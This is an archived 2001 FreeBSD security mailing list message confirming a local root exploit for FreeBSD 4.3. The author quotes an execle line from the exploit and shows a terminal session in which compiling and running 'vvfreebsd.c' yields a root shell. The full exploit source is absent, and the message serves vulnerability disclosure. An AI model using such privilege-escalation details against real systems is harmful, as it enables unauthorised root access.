From owner-freebsd-security Thu Jul 12 9: 2:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost.freebsd.lublin.pl (mailhost.freebsd.lublin.pl [212.182.115.12]) by hub.freebsd.org (Postfix) with ESMTP id 82A1537B405 for ; Thu, 12 Jul 2001 09:02:06 -0700 (PDT) (envelope-from venglin@freebsd.lublin.pl) Received: from clitoris (root@mailhost.freebsd.lublin.pl [212.182.115.12]) by mailhost.freebsd.lublin.pl (8.11.4/8.11.4) with SMTP id f6CG1Pr81396; Thu, 12 Jul 2001 18:01:25 +0200 (CEST) (envelope-from venglin@freebsd.lublin.pl) Message-ID: <075701c10aeb$a7639c40$2001a8c0@clitoris> From: "Przemyslaw Frasunek" To: "Jason DiCioccio" , "Matjaz Martincic" , References: <02a201c10ae3$ece26b00$bf960340@jason8bo2vxz5e> Subject: Re: FreeBSD 4.3 local root Date: Thu, 12 Jul 2001 17:59:28 +0200 Organization: babcia padlina ltd. MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > The binary must be named vv.. > Name the binary 'vv' and try again No, because argv[0] is exec()ed: if(!execle(av[0],"vv",NULL,environ)) [...] riget:venglin:~> cc -o dupa vvfreebsd.c riget:venglin:~> ./dupa vvfreebsd. Written by Georgi Guninski shall jump to bfbffe72 child=81380 Password:done # id uid=0(root) gid=1001(users) groups=1001(users), 99(rexec) -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message